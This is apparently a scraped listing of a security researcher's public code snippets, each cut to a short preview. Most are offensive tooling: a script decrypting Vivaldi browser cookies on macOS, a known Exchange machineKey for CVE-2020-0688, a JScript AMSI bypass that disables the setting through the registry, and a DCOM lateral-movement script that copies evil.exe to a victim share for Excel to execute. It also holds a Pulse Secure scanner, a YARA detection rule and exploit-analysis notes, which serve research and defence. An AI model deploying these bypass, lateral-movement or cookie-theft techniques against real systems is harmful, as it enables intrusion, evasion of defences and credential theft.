rxwx /
Created Apr 15, 2020
Get Office version that last saved the file
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
rxwx /
Last active May 14, 2020
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
rxwx /
Created Aug 13, 2019
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
    # usage message names the script itself (sys.argv[0]) so the reader sees the expected invocation
    print(" Usage: python %s <target ip/domain>" % sys.argv[0])
rxwx / bypass.js
Created Aug 16, 2018
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
Created May 4, 2018
File Zip in native PowerShell with .NET 3.0
Author: Rich Warren
Based on original c# code by Jon Galloway:
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
rxwx /
Last active Feb 21, 2020
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 as well.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

Created Sep 17, 2017
Yara rule to detect attempts to exploit .NET CRLF injection in a WSDL file (aka CVE-2017-8759)
rule CVE_2017_8759_CRLF {
    meta:
        description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
        author = "Rich Warren @buffaloverflow"
        reference = ""
        date = "2017-09-17"
    strings:
        $s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
    condition:
        // assumed: the truncated preview omits the condition; the rule's single string is matched here
        $s1
}
rxwx / foxprow.ps1
Last active Sep 14, 2017
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", ""))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
# excel executes your binary :)
